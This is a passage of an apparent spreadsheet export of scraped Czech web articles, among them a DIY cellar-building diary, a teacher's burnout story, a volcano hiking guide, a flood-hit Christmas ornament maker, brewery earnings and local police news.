povolení, měli na základě projektové studie vydané územní rozhodnutí. Navazovalo se na stávající domek, takže bylo odkud se odpíchnout. Podle projektu jsem si označil na domečku výškovou nulu, postavil lavičky a pásmem a nivelákem vyměřil rohy sklepa. Snažil jsem se o co největší přesnost, jedna stěna sklepa je zároveň součástí základů pod novým RD. Sklep tedy bude, i když samotný RD je nepodsklepený. Do základů sklepa jsem položil zemnící pásku s přesahy v rozích, kde bude napojení RD. Na připravené pasy jsem postupně vyskládal a vybetonoval stěny ze ztraceného bednění. Po dosažení finální výšky jsme na stěny nalepili hydroizolaci. Kolem stěn sklepa je zevnitř přizdívka z nabouraných cihel pojatá jako lícové zdivo. Už při stavbě přizdívky jsem si za ní natahal elekriku a nachystal přípojku sklepa. Nad sklepem je plánováno venkovní WC, takže jsem nachystal i odvod kanalizace. Trubka kanalizace je schovaná v nosníku stropu sklepa a vyústěná pod desku RD. Reklama a 1 další Sklep - schody, strop a podlaha Protože zima 2022/23 byla mírná, neztrácel jsem čas a pustil se do schodů do sklepa. Protože se mi nechtělo schody kompletně bednit a složitě armovat, rozhodnul jsem se použít stropní nosníky a snížené stropní desky. Tento polotovar schodišťového ramene jsem řádně podstojkoval. K armatuře nosníků jsem přivázal další výztuž z žebírkové oceli fí 8mm a po rozměření vyšaloval jednotlivé stupně. Schody jsme betonovali na konci února, beton jsme dělali v míchačce na stavbě s přídavkem zimní chemie. S výsledkem jsem spokojený, dosud nikde nejsou trhliny ani jiné vady. Strop sklepa jsme vyskládali z PZD desek a zmonolitnili ho přetažením 4 cm potěrového betonu a věncem okolo. Sklep je navržený jako polosuchý. Odizolovány jsou pouze stěny, pod podlahou hydroizolace není. Podlahu sklepa jsem vyskládal z cihel, spáry zasypal přesátou zeminou smíchanou s pískem. Sklep jsem uzavřel repasovanými vybouranými dveřmi. Konečně mám kde chladit pivo ! Ještě před rozpukem jara jsme s těžkým srdcem pokáceli krásný ořešák. Přidávat hodnocení může pouze přihlášený stavebník O autorovi Víte, že můžete také vytvářet příspěvky? Kvalitní příspěvky finančně odměníme. Zobrazit více informací Přečtěte si také Odesláním souhlasíte se zpracováním osobních údajů Reklama Autor: Autor: | Roman | (3 příspěvky)</t>
  </si>
  <si>
    <t>4430</t>
  </si>
  <si>
    <t>20241101_424_3241869204_63a80505adc06a956840.html</t>
  </si>
  <si>
    <t>63a80505adc06a956840</t>
  </si>
  <si>
    <t>Můj život už má zase smysl!</t>
  </si>
  <si>
    <t>Můj život už má zase smysl! v rubrice Příběhy Těšila jsem se na to, až začnu učit. Ve škole však nevládla pohodová atmosféra, ale tvrdá disciplína. Málem jsem ztratila své ideály. Už jako malá jsem měla jasno, čím chci v životě být. Při zápisu do první třídy jsem se zhluboka nadechla a vyslovila hrdě: „ Budu paní učitelka!“ Ta, která mě vítala a poté učila v první třídě, byla báječná. Všechny nás bavilo do školy chodit. Premiantka Hodně se změnilo na druhém stupni. byli tam učitelé skvělí, ale také ti, co neměli v této profesi co dělat. Neměli s dětmi trpělivost a neuměli vysvětlit látku. Tu jsem vysvětlovala spolužákům často já, protože jsem patřila mezi premianty. Byla jsem potěšená, když mě spolužáci chválili, že to ode mě konečně pochopili. Budu dobrá učitelka! Říkala jsem si. Nemohla jsem se dočkat, až se postavím za katedru a budu mít před sebou svoje první žáky. Ztracené iluze Měla jsem hlavu plnou snů a představ, jak to bude báječné a jak pod mým vedením budou děti vzkvétat. S tím jsem po vysoké škole pedagogické nastoupila na první místo. A tam přišla krutá realita. Se žáky jsem problémy neměla, byl to pedagogický sbor, který mě doháněl k zoufalství. Jejich přístup k učení byl hrozný. Žádný Komenský a jeho škola hrou to nebyl! S každým dalším dnem jsem přicházela o iluze a po několika letech učení jsem propadla beznaději úplně. Dostavil se těžký stav vyhoření. Úzkosti, deprese. Začala jsem se uchylovat k alkoholu , jímž jsem zapíjela ztrátu svých snů. Byla jsem protivná sama sobě, nedivím se dnes s odstupem, že i manžel ode mě v té době odešel. Děti jsme neměli. Nakonec jsem odešla ze školství úplně a začala pracovat na úřadě. Našla jsem se! Zklamaná, znechucená, osamělá. Dostala jsem se na oddělení, kde jsem se setkávala s rodiči s postiženými dětmi. Cítila jsem se alespoň užitečná, když už jsem nedělala práci, kterou jsem vystudovala. A pak jednou přišla ta nabídka. Jedna paní se mi zmínila o tom, že se hledá pedagog do speciální školy pro autisty. Najednou jsem pocítila zvláštní teplo u srdce. To bude ono! A za dva měsíce jsem tam už učila. A jsem v té škole dodnes. Kolegové jsou tam úžasní. Přesně takoví, jak jsem si je představovala. Vstřícní, laskaví, trpěliví. Našla jsem mezi nimi dokonce svého životního partnera. Tady mi vrátili zpátky radost z práce, kterou jsem si vysnila. Vlasta (57), Praha 0 0 votes Autor: Karla Pelikánová Autor person Karla Pelikánová Rubrika transition_slide Příběhy</t>
  </si>
  <si>
    <t>16</t>
  </si>
  <si>
    <t>20241101_425_3241799096_3215b4a9d9d5d20c3fa1.html</t>
  </si>
  <si>
    <t>3215b4a9d9d5d20c3fa1</t>
  </si>
  <si>
    <t>Výlet na víkend: Velký Roudný - po turistické značce na rozhlednu vstup na vlastní nebezpečí</t>
  </si>
  <si>
    <t>Výlet na víkend: Velký Roudný - po turistické značce na rozhlednu vstup na vlastní nebezpečí close + 11 fotografií Velký Roudný je nejvyšší stratovulkán Moravy a Slezská Harta je nejmladší přehrada. Obojí stihnete během jednoho výletu. Na vrcholu Velkého Roudného mezi kapličkou a rozhlednou někdo rozdělal oheň. Pořádná polena drží žár a oheň poskytuje iluzi táborničení. Třeba jen na chvíli, než si člověk stihne odpočinout, dát si svačinu a pár loků piva , které si vytáhl na vlastních zádech. Žádná horská chata tady totiž není. Vzhůru na vulkán Pokud se chystáte na Velký Roudný a máte auto, ideální je zaparkovat v obci Roudno a vyrazit po naučné stezce s názvem Po vulkanitech. Není to žádná nadsázka, skutečně vyrazíte do kopce v některých chvílích kolmo na vrstevnice, takže opravdu strmě do kopce, na nejvyšší sopku Nízkého Jeseníku . Velký Roudný s výškou 780 m, je jedním z mála vulkánů s výjimečně tvarově dochovaným sopečným kuželem v České republice . České středohoří je sice krajinou třetihorních sopek, ale většinou se jedná o lakolity, tedy erozí vypreparované podpovrchové sopečné útvary. V případě Velkého Roudného jde o „opravdovou“ sopku s několika lávovými výlevy. Jen soptila před 3,33 miliony lety. Nádražky: Hospody, které dělaly cestování lepším. Tady ještě fungují video Jedná se o stratovulkán, u kterého se střídaly výlevné a eruptivní fáze. Ve skutečnosti už ho za ty miliony let eroze taky trochu „zbrousila“. Jedna z informační cedulí naučné stezky se věnuje zdejším lávovým proudům. Je vlastně jen takovou zvláštní hříčkou historie, že v místech, kde je dnes přehradní nádrž Slezská Harta, mimochodem nejmladší přehrada u nás, bylo v minulosti jezero, které vzniklo přehrazením řeky jedním z lávový proudů. „Čedič lávového proudu je v současnosti dobýván ve stěnovém lomu u Bílčic,“ informuje zvědavce web nizkyjesenik.cz. Cestou na vrchol se ozvalo zazvonění. „ Není ani poledne, ani celá, tak co v tom kostele blbnou, “ zaznělo mezi výletníky sápajícími se na vrchol. Teprve později nám došla pointa. Na vrcholu rozhledny byl malý zvon, na který si mohl kdokoli zazvonit. Odolal málokdo. Cedulka u vchodu na dřevěnou, dvacet metrů vysokou rozhlednu (vyhlídková plošina je v sedmnácti metrech) z modřínových trámů upozorňuje, že vstup je jen na vlastní nebezpečí. Výstup není nijak nebezpečný, jde jen o bezpečností opatření ze strany provozovatele. gallery 8 video Na kapličku jen na vlastní nebezpečí Postavená byla v roce 2007 a vyleze na ni každý, kdo dosáhne vrcholu. Pokud není mlha, dohlédnete na Praděd, samotná vodní plocha Slezské Harty je nedaleko pod vámi. Zato do kapličky postavené v roce 1933 se nepodíváte, protože okno, kterým by to šlo, je zasklené mlžným neprůhledným sklem. Dnes už opět působí festovným dojmem, prodělala totiž v roce 1988 rekonstrukci, předtím ale léta chátrala. Dne 16. 9. 1996 byla prohlášena nemovitou kulturní památkou. „ Neomítaná kaple je vystavěna z cihelného zdiva, lomového materiálu a umělého kamene. Do lodi se otevírá předsíň špaletovitou půlkruhovitou arkádou, “ píše se ve vyhlášení, které podepsala Kamila Matoušková, tehdejší ředitelka odboru Památkové péče Ministerstva kultury ČR. Slezská Harta - ještě nebyla hotová a už zachraňovala Koruna hráze Slezské Harty je více než půl kilometru dlouhá. Přesně 540 m. „Součástí díla je vodní elektrárna se dvěma Francisovými turbínami o výkonu 2,75 a 0,4 MW,“ dodává podrobnosti Povodí Odry . Celkový objem nádrže je 218,7 mil. metrů krychlových vody, což už je něco, co se při povodních může hodit. Nejde o nadsázku nebo novinářkou zkratku, ale dokázaný fakt, protože dokončovaná přehrada pobrala část vody během povodní v roce 1997. Toto je Slezská Harta. Zdroj: Youtube Povodeň vlastně přehradu napustila a zachránila tak Bruntálsko před ještě většími škodami. „V roce 1997 jsme si pořádně oddechli, protože pokud by nebyla Harta, tak by to s Hradcem bylo moc špatné, “ popsal situaci tehdejší starosta Josef Vícha . Přehrada během povodní zadržela okolo 50 milionů m³ vody. Pouze za rok 1997 hladina stoupla o 6,85 metru. Zdroje:</t>
  </si>
  <si>
    <t>8570</t>
  </si>
  <si>
    <t>35360</t>
  </si>
  <si>
    <t>20241101_426_3241796016_adb89da73cbe35981e98.html</t>
  </si>
  <si>
    <t>adb89da73cbe35981e98</t>
  </si>
  <si>
    <t>Terraform: Opravdu se všechny IT girls skrytě nenávidí?</t>
  </si>
  <si>
    <t>Terraform: Opravdu se všechny IT girls skrytě nenávidí? Josefína Joštová Zanechat komentář na Terraform: Opravdu se všechny IT girls skrytě nenávidí? I na tuto otázku se ve svém novém projektu snaží odpovědět zpěvačka Terra. Terraform je první projekt, který Terra napsala, zprodukovala i zafinancovala sama a zabývá se tématy jako je body dysmorfie nebo deprese. Po překonání tvůrčí paralýzy způsobené izolací a bojem se závislostí a depresí se Terra upřímně a – jak má ve zvyku – provokativně vrací na scénu s audiovizuálním projektem Terraform. „Je to první projekt, který jsem nejen napsala a nazpívala, ale taky zprodukovala, zrežírovala a celý sama zafinancovala. Reprezentuje stovky hodin moodboardů, psaní scénáře, produkce hudby a nahrávání, měsíce šetření a budgetování, týdny příprav, stresu, schůzek, přestavby mého pokoje v Berlíně a čtyři dny celodenního natáčení následované měsíci postprodukce, “ vzpomíná na vznik projektu Terra. @natythechild Krátký film a EP ilustrují její roční propad do sebedestrukce. Ten je vykreslen během jediné noci, kdy Terra kompletně ztrácí kontakt s realitou a všechno se zhroutí: „Terraform reprezentuje roky mého vlastního života. Roky boje a srovnávání se se svým tělem a myslí,“ říká zpěvačka. Projekt se blízce dotýká témat jako jsou poruchy příjmu potravy, body dysmorfie, závislosti, sociální sítě a sebesexualizace. „Roky přejídání se, roky hladovění, roky kroucení se před kamerou abych vypadala co nejhubenější, co nejkrásnější, co nejpřirozenější. Roky oblbování se hulením a alkoholem . Roky zneužívání sama sebe pro validaci těch, kteří se vyžívali v tom mi ubližovat, roky honu za pozorností, roky krmení nenasitného ega. Roky vyrovnávání se se znásilněním,“ reflektuje Terra. Víte, čím si mladé ženy prochází o samotě? A jak blízko mají zdánlivě dokonalé IT girls k sebenenávisti? Projekt byl režírován a natočen ve spolupráci s běloruskou feministickou režisérkou Soniou Kharitoniouk v Berlíně na začátku roku 2024 a je doprovázen audiovizuální výstavou v Praze v galerii Místečko na Žižkově , kterou můžete navštívit do konce listopadu. Autor: Josefína Joštová Autor person Josefína Joštová Rubrika transition_slide PRŮVODCE</t>
  </si>
  <si>
    <t>239</t>
  </si>
  <si>
    <t>20241101_427_3242458135_0afc46c0abf3a725290e.html</t>
  </si>
  <si>
    <t>0afc46c0abf3a725290e</t>
  </si>
  <si>
    <t>Opavské retro ozdoby odnesla voda. Ženy ze Slezské tvorby ale křehké nejsou. Jak probíhají přípravy na Vánoce?</t>
  </si>
  <si>
    <t>Opavské retro ozdoby odnesla voda. Ženy ze Slezské tvorby ale křehké nejsou. Jak probíhají přípravy na Vánoce? V roce 2023 dokončili poslední opravy po povodních z roku 1997. Letos jim prostory výroby totálně zničila voda ještě o metr vyšší, s dravostí, která rozštípla i protipožární dveře. Výrobce tradičních vánočních ozdob Slezská tvorba z Opavy ale rozhodně v jádru křehký není – v náročných podmínkách chce tradici ručního řemesla udržet i nadále. Nafoukni se, nepraskni „Většina žen u nás pracuje více než 25 let. Mezi malířkami najdeme i kolegyni se 40 odpracovanými lety ,“ uvádí Hana Rybková, předsedkyně výrobního družstva Slezská tvorba, jehož historie se začala psát v roce 1951. V počátku zde tvořili širší sortiment textilního zboží, dřevěné hračky a také skleněné vánoční ozdoby. Ty jediné zůstaly do dneška. „Práce není fyzicky náročná, ale potřebuje cvik. Než člověk získá potřebnou zručnost a rychlost při jednotlivých operacích, trvá to u malování minimálně rok, u foukání ještě déle ,“ upozorňuje Rybková. Retro ozdoby v Česku frčí. Výroba se za existenci výrobního družstva takřka nezměnila. | Foto: Slezská tvorba Jejich výroba je vlastně malou verzí sklárny. První fázi procesu výroby tvoří foukání do forem či volně do prostoru. „ Děje se tak ze skleněných trubic ústy nad kahanem ,“ upozorňuje Rybková. Pak už přijdou na řadu zručné ruce – ozdoby se uvnitř barví roztokem dusičnanu stříbrného s redukčním činidlem. Po zaschnutí se umyjí, osuší, malují, zdobí a balí. Vše se děje na jednom místě a výhradně ženami. „Momentálně máme třicet dva zaměstnanců, z toho pouze tři muže – vrátného, údržbáře a vedoucího výroby. Je to dáno i historicky, povahou výrobních programů,“ vysvětluje Rybková. Retro ozdoby v Česku frčí. Výroba se za existenci výrobního družstva takřka nezměnila. | Foto: Slezská tvorba Koule, špice, kominík Za rok zde vytvoří půl milionu ozdob v nepřeberném množství barev, vzorů a tvarů – koule ve velikosti od 4 do 10 centimetrů, olivy, rakety, zvonky, špice a také figurky. „ V tuzemsku vítězí retro v rozsáhlejší škále odstínů. Tvarově převládají klasické koule a špice, zvýšený zájem je také o figurky, například sněhuláky, kominíky, anděly, pejsky, medvědy, sovy či ryby,“ dává nahlédnout do českého vánočního vkusu Rybková. Zahraničí jde podle ní s trendy barev a stylů pro daný rok. Malířky při práci. Baňky zdobí barvami, posypy, korálky či třpytkami. | Foto: Slezská tvorba Mezi největší odběratele patří Německo , Holandsko , Velká Británie , Švédsko , Rakousko , Itálie a Francie . Z Opavy je posílají ale i do USA , Austrálie či na Nový Zéland . Sezónu proto mají celoročně. „V lednu jsou děvčata doma maximálně 14 dnů. Většina zahraničních objednávek se totiž vyrábí a expeduje do srpna, od září začínáme odesílat zakázky tuzemské,“ říká Rybková. Nejnáročnější fází v procesu výroby je foukání. | Foto: Slezská tvorba Zůstaly jen kostry Všechnu jemnou krásu však na začátku lokální sezóny letos vzala voda. „Od 16. září stála celá výroba, až v druhé polovině října začaly malířky zpracovávat zachráněný materiál. Přízemní prostory byly totálně zničeny. Z vybavení malírny zůstaly jen kovové kostry stojanů. Foukárna stále stojí, přišli jsme o veškeré rozvody elektřiny ,“ popisuje aktuální situaci Rybková. Škodu vyčíslují na 20 miliónů, jen oprava výrobních prostor zabere minimálně rok. Stejnou dobu nebude patrně možné zde navštívit ani kreativní dílny či exkurze. Celé přízemí budovy vzala voda, oproti roku 1997 byla ještě o metr vyšší. | Foto: Slezská tvorba Na situaci družstva ihned po zveřejnění reagovali lidé z Česka i zahraničí. E-shop zaplavily objednávky, na které byla Slezská tvorba kvůli nedostupné elektřině a internetu schopná reagovat s dvoutýdenním zpožděním. „ Přicházely i od českých menšin žijících v zahraničí, kde tvořili hromadné objednávky za celou komunitu ,“ uvedla Rybková. Na místě pomáhali i dobrovolníci z řad rodinných příslušníků a přátel. „Patří jim velké poděkování, stejně tak i paní Slávce, zdravotní sestře z Fakultní nemocnice Ostrava a zaměstnancům společnosti Activair z Brna za obětavou, nezištnou pomoc,“ vyjmenovává Rybková. Povodeň zničila i kreativní dílnu a podnikovou prodejnu. | Foto: Slezská tvorba Kromě nákupu produktů lze podržet tradiční výrobu baněk v Opavě i skrze Donio . „Lidé nás chtěli podpořit také finančně. Proto jsme se rozhodli pro tuto možnost. Vybraná částka bude použita na obnovu budovy a rozjetí výroby ,“ děkuje dárcům Rybková. Jak se připravit na další podobnou situaci, která může v budoucnu nastat, v Opavě přemýšlí. Důležitější jsou ale momentálně činy: „V tuto chvíli je naše veškerá pozornost zaměřena na rozjetí výroby a zvládnutí sezóny,“ uvádí v závěru Rybková. Díky jejich nasazení si tak nostalgii tradičních Vánoc budeme moci pověsit na stromeček i v tomto roce. Volně foukané muchomůrky. Možná je věšela na stromeček i vaše babička. | Foto: Slezská tvorba Retro ozdoby v Česku frčí. Výroba se za existenci výrobního družstva takřka nezměnila. | Foto: Slezská tvorba Nejnáročnější fází v procesu výroby je foukání. | Foto: Slezská tvorba Retro ozdoby v Česku frčí. Výroba se za existenci výrobního družstva takřka nezměnila. | Foto: Slezská tvorba Malířky při práci. Baňky zdobí barvami, posypy, korálky či třpytkami. | Foto: Slezská tvorba Celé přízemí budovy vzala voda, oproti roku 1997 byla ještě o metr vyšší. | Foto: Slezská tvorba Povodeň zničila i kreativní dílnu a podnikovou prodejnu. | Foto: Slezská tvorba Malírna po povodních – vpravo v roce 1997, vlevo snímek z letošního září. | Foto: Slezská tvorba Volně foukané muchomůrky. Možná je věšela na stromeček i vaše babička. | Foto: Slezská tvorba Sdílet Sklo české firmy Tradice Vánoce Autor: Anna Handlová Autor person Anna Handlová Rubrika transition_slide České firmy</t>
  </si>
  <si>
    <t>20241101_428_3241771341_26518fd3fb1c49a2d06e.html</t>
  </si>
  <si>
    <t>26518fd3fb1c49a2d06e</t>
  </si>
  <si>
    <t>Pivovar AB InBev zvýšil ve třetím čtvrtletí hrubý zisk, objem prodeje ale klesl</t>
  </si>
  <si>
    <t>Pivovar AB InBev zvýšil ve třetím čtvrtletí hrubý zisk, objem prodeje ale klesl 01.11.2024 | ČTK Nadnárodní pivovarnická skupina AB InBev zvýšila ve třetím čtvrtletí hrubý provozní zisk (EBITDA) o 7,1 procenta na 5,42 miliardy dolarů (126,7 miliardy Kč). Výsledky ale zaostaly za očekáváním analytiků a objem prodeje klesl. Společnost současně v dnešní tiskové zprávě oznámila odkup svých akcií za dvě miliardy USD. Analytici v průměru očekávali zvýšení EBITDA o 8,6 procenta. Tržby stouply o 2,1 procenta na 15,57 miliardy USD, zatímco analytici předpokládali růst o 3,4 procenta. Objem prodeje ale klesl o 2,4 procenta, prognóza analytiků počítala se snížením o 0,4 procenta. Na svém největším trhu, kterým jsou Spojené státy , prodal AB InBev méně piva , podle analytiků si tam ale firma i tak vedla lépe, než se čekalo. Pokles zaznamenala kvůli špatnému počasí a nízké spotřebitelské poptávce také v Mexiku a v Evropě . V Číně se pak tržby snížily o 16,1 procenta a objem prodeje o 14,2 procenta. Všichni velcí producenti piva a lihovin zaznamenali v posledních měsících nižší poptávku, zejména kvůli problémům v ekonomice, špatnému počasí a tvrdší konkurenci levnějších producentů po celém světě. AB InBev ale mírně vylepšil svůj celoroční výhled zisku, přestože na trzích v USA , Mexiku , Evropě nebo Číně se prodává méně piva . Pivovar nyní očekává zvýšení EBITDA o šest až osm procent místo dříve uváděných čtyř až osmi procent. AB InBev je největší výrobce piva na světě. Vznikl akvizicí amerického podniku Anheuser -Busch s belgicko-brazilským koncernem InBev. Mezi jeho značky patří americký Budweiser , mexická Corona, německé Beck's a Löwenbräu či belgické Hoeggarden, Leffe a Stella Artois. O používání značky Budweiser nicméně Anheuser -Busch vede už desítky let řadu známkoprávních sporů s českým pivovarem Budějovický Budvar . Copyright (2003) The Associated Press (AP) - všechna práva vyhrazena. Materiály agentury AP nesmí být dále publikovány, vysílány, přepisovány nebo redistribuovány.</t>
  </si>
  <si>
    <t>602000</t>
  </si>
  <si>
    <t>20241101_429_3241771003_0fc7b1b0998625282ddf.html</t>
  </si>
  <si>
    <t>0fc7b1b0998625282ddf</t>
  </si>
  <si>
    <t>V Hustopečích ochutnáte exkluzivní vína z celého světa! Po roce se opět koná Světový duel vín</t>
  </si>
  <si>
    <t>V Hustopečích ochutnáte exkluzivní vína z celého světa! Po roce se opět koná Světový duel vín 01. 11. 2024 - HUSTOPEČE - V sobotu 23. listopadu od 10 hodin se v Hustopečích uskuteční další, již 14. ročník unikátní výstavy Světový duel vín. Exkluzivní vína světa a vybraná vína z ČR se i letos utkají v pomyslném duelu Výjimečnou akci nejen na Hustopečsku , ale v celé České republice , založil v roce 2008 hustopečský vinař a majitel prestižního butikového vinařství Miroslav Hrabal, který s kolegy pravidelně objíždí proslulé vinařské oblasti po celém světě a díky svým bohatým kontaktům a zkušenostem přiváží do Česka vína , ke kterým se běžný člověk jen tak nedostane. „Letos by mělo být největším lákadlem burgundské Chardonnay a samozřejmě také Pinoty. Těšit se ale můžete také na méně známé odrůdy, jako je Meursault, Chambertin, Chambolle, Pommard, Montrachet a Chablis. A mnohé jistě potěší tradičnější odrůdy z různých států světa, kterými jsou Ryzlinky, Sauvignony, Merloty nebo třeba Cabernety,“ zve na akci za pořadatele Miroslav Hrabal. Zastoupeny budou vinařské velmoci, jakými jsou Francie , Itálie či Německo . Svá vína ale nabídnou i další zajímavé, i když méně typické regiony či země, kterými je určitě Švýcarsko , Lucembursko , Slovinsko , Izrael a Brazílie . Samozřejmostí jsou pak skvělá vína z domácí produkce. Pořadatelem akce je město Hustopeče za finanční podpory pana Karla Losenického. Pokud vás zajímá gastronomie, máte rádi dobré jídlo a pití, navštěvujete kvalitní restaurace, kavárny a bary, pak čtěte také tištěný gastro magazín Štamgast a Gurmán . Autor: Štěpán Prachař Autor person Štěpán Prachař</t>
  </si>
  <si>
    <t>20241101_43_3264738348_bd7de1119afd997ded21.html</t>
  </si>
  <si>
    <t>bd7de1119afd997ded21</t>
  </si>
  <si>
    <t>Řidiči vběhla do cesty srnka. Ten strhl řízení, skončil v příkopu a v nemocnici</t>
  </si>
  <si>
    <t>Řidiči vběhla do cesty srnka. Ten strhl řízení, skončil v příkopu a v nemocnici KRCHLEBY - Havárie osobního auta uzavřela silnici v úseku Krchleby - Loučeň . Před 19. hodinou tam došlo k nehodě, když se řidiče za volantem osobního vběhla do cesty srnka. "Ten se pokusil zvířeti vyhnout, ale havaroval do příkopu. Ve vozidle cestoval společně se spolujezdkyní. Oba utrpěli zranění, se kterým je sanitka převezla do nemocnice k dalšímu ošetření," uvedla mluvčí nymburské policie Barbora Schneeweissová s tím, že alkohol u řidiče vyloučila dechová zkouška. Komunikace musela být krátce uzavřena. "V tuto chvíli by měla být již průjezdná jedním pruhem," uvedla policistka. Autor: TOK Rubrika transition_slide Hlavní</t>
  </si>
  <si>
    <t>20241101_430_3241770985_48cc7ef2c5c905494e04.html</t>
  </si>
  <si>
    <t>48cc7ef2c5c905494e04</t>
  </si>
  <si>
    <t>Na Silvestra se svléknou Dva úplně nazí muži</t>
  </si>
  <si>
    <t>Na Silvestra se svléknou Dva úplně nazí muži 1. 11. 2024 Dva úplně nazí muži je veleúspěšná komedie Slováckého divadla , která v lednu oslaví neuvěřitelných šest let na scéně a hlásí neustále vyprodané reprízy. Přesto se v letošním roce poprvé stane slavnostním silvestrovským představením. Těší se na ni i herec Pavel Šupina . Pavle , k silvestrovskému představení patří vtípky na kolegy. Podařily se vám nějaké vtípky už i u komedie Dva úplně nazí muži? Něco se vyklube každou reprízu. Přece jen hrajeme s Tomem Šulajem oba nazí a zakrýváme se tím, co máme v ruce, a ne vždycky všechno vyjde. Třeba v jedné scéně si zakrývám nahé tělo polštářem v jedné ruce a po Tomovi házím časopisem z druhé ruky. Jenomže jednou jsem si ty ruce popletl a hned jsem měl zadek celý odkrytý do diváků (smích). Co následovalo? Oběma nám to okamžitě došlo a začali jsme se smát, ale zároveň jsme se ten trapas snažili vzít do hry. Je to ale naštěstí komedie a ta dovolí víc. Když divák vnímá, že se tím sami pobavíme, baví se taky. Jak jste na tom s chystáním silvestrovských nachytávek na kolegy vy? Možná vymyslím občas nějaké drobnosti, které kolegy úplně až tak nerozhodí. Máme na to v divadle jiné experty, kteří jsou velmi iniciativní. Tak si říkám, že nábojů je všude kolem dost, a já se je budu snažit spíš chytat a odrážet zpátky (smích). Absurdní humor „Naháčů“ diváci milují Komedii Dva úplně nazí muži uvedlo Slovácké divadlo v režii Lukáše Kopeckého na scénu v lednu roku 2019. Dodnes si drží obrovskou diváckou popularitu a návštěvníci divadla absurdní humor, který herci přinášejí na jeviště, naprosto milují. „Smála jsem se tak, že jsem chvílemi přes slzy neviděla na jeviště. Něco tak absurdně vtipného a úžasného jsem na jevišti snad ještě neviděla,“ napsala do Slováckého divadla jedna z nadšených divaček. A o čem komedie pojednává? Úspěšný pařížský právník a věrný manžel v podání Tomáše Šulaje , se jednoho dne probudí nahý vedle svého podřízeného z advokátní kanceláře, kterého hraje Pavel Šupina. A ten je rovněž nahý. Ani jeden z nich situaci nechápe. Co se mohlo stát? K tomu všemu se vzápětí domů vrací i právníkova žena Catherine. Podaří se za této konstelace ubránit jejich dvanáct let trvající manželství? A může se to povést, když Catherine objeví svého manžela a jeho kolegu nahé podruhé? Kromě dvou mužských herců v komedii excelují i dvě ženy: Tereza Groszmannová v roli manželky Catherine a Petra Staňková v úloze lehké děvy. Poslední vstupenky na silvestrovský večer s komedií Dva úplně nazí muži jsou pro diváky k dispozici na webu a v pokladně Slováckého divadla . Na Silvestra je v divadle vždycky veselo Silvestrovský večer v divadle mají rádi diváci i herci. Potvrzuje to například Pavel Šupina . „Třeba vloni jsem na Silvestra v divadle byl, i když jsem nehrál. Pomohl jsem s degustací vína ve foyer a strávil s kolegy a diváky příjemný večer,“ říká herec, který se letos objeví i na jevišti. Oblibu silvestrovských večerů potvrzuje i Zdeněk Trčálek , který vloni na Silvestra nechyběl v oceňované komedii Třináctkrát za svědka. „Všichni si o Silvestru rádi vymyslíme na kolegy nějaký ten fórek, protože v tento jediný den je všechno dovoleno. Člověk se na jevišti vyřádí ještě víc než obvykle, smějí se diváci a často i herci,“ usmívá se Zdeněk . K silvestrovskému večeru v divadle patří nejen speciální představení, ale i další bohatý program. „Po představení si připijeme s diváky, poděkujeme jim za jejich celoroční přízeň a popřejeme všechno dobré do roku nového. A pak už se všichni společně, tedy diváci, herci i ostatní divadelníci, sejdeme ve foyer, kde bude připravený jako každý rok bohatý raut a ochutnávka vína a strávíme společně jedny z posledních chvil roku 2024,“ prozrazuje herec a mluvčí divadla Josef Kubáník .</t>
  </si>
  <si>
    <t>568</t>
  </si>
  <si>
    <t>934</t>
  </si>
  <si>
    <t>20241101_431_3241762557_9c4e5c8b783a1f24d14e.html</t>
  </si>
  <si>
    <t>9c4e5c8b783a1f24d14e</t>
  </si>
  <si>
    <t>Svatomartinská husa v restauraci Hanačka</t>
  </si>
  <si>
    <t>Svatomartinská husa v restauraci Hanačka Přijďte na svatomartinskou husu do restaurace Hanačka v Troubelicích. Máme pro Vás připraveno také tradiční svatomartinské víno a na čepu svatomartinské pivo . Rezervace: SMS na tel. 702 124 743: jméno, příjmení, datum, čas, počet osob. Počasí: dnes 9 °C Rychlost větru: 3 m/s Oblačnost: 85 % Tlak: 1032 hPa Vlhkost: 74 % Rychlost větru: 1 m/s Oblačnost: 34 % Tlak: 1030 hPa Vlhkost: 50 % Rychlost větru: 1 m/s Tlak: 1028 hPa Vlhkost: 47 % Rychlost větru: 1 m/s Tlak: 1028 hPa Vlhkost: 57 % Rychlost větru: 1 m/s Oblačnost: 82 % Tlak: 1029 hPa Vlhkost: 67 % Rychlost větru: 2 m/s Oblačnost: 2 % Tlak: 1029 hPa Vlhkost: 70 % Rychlost větru: 10 m/s Oblačnost: 100 % Tlak: 1013 hPa Vlhkost: 82 % Rychlost větru: 9 m/s Oblačnost: 99 % Tlak: 1014 hPa Vlhkost: 73 % &amp;lt; &amp;gt; Kudy z nudy přináší aktuální tipy na víkendové zážitky (9.11. – 10.11.). Na jediném místě najdete tipy na akce ze všech krajů a regionů České... Přiveze letos svatý Martin do Česka sníh? I když to vypadá, že by to stihnout mohl, s jistotou to tvrdit nemůžeme. Ale už teď je jisté, že společně s... Dozlatova upečená husička, zelí a knedlíky, k tomu sklenka místního piva nebo něčeho ostřejšího. Kolem svátku Martina nabídne svatomartinskou husu...</t>
  </si>
  <si>
    <t>20241101_432_3241768230_f733374621888f746bab.html</t>
  </si>
  <si>
    <t>f733374621888f746bab</t>
  </si>
  <si>
    <t>Muž na Liberecku se hnal jako o život. Nezastavil ho ani zákaz řízení</t>
  </si>
  <si>
    <t>Muž na Liberecku se hnal jako o život. Nezastavil ho ani zákaz řízení V pondělí 28. října naměřili policisté z Dopravního inspektorátu Liberec jednomu z řidičů na silnici I/35 mezi Libercem a Ohrazenicemi vysokou rychlost. Šofér vozu Škoda Octavia výrazně překročil povolený limit, když v úseku s maximální rychlostí 80 km/h jel rychlostí 105 km/h. Nejenže zvolil takto nebezpečnou jízdu, ale na cestu se vydal bez řidičského dokladu. „Důvodem nebylo ale to, že by jej zapomněl doma, ale platný zákaz řízení všech motorových vozidel až do května roku 2025 uložený Městským úřadem Rokycany ," upřesnila mluvčí policie Libereckého kraje Klára Jeníčková. Během kontroly také policisté provedly dechovou zkoušku na alkohol , která však vyšla negativně. play_fill Liberecko „Jedenačtyřicetiletý řidič byl následně převezen na Obvodní oddělení Vápenka k dalším potřebným úkonům. Po sepsání oznámení přestupku místně a příslušenému orgánu o překročení maximální dovolené rychlosti, si řidič od policistů převzal také Záznam o sdělení podezření z přečinu maření výkonu úředního rozhodnutí a vykázání, za který mu dle trestního zákoníku hrozí trest odnětí svobody až na dva roky," doplnila Jeníčková. Dopravní nehoda tramvaje na Šaldově náměstí | Video: Deník/Martina Janurová Autor: Martina Janurová Autor person Martina Janurová</t>
  </si>
  <si>
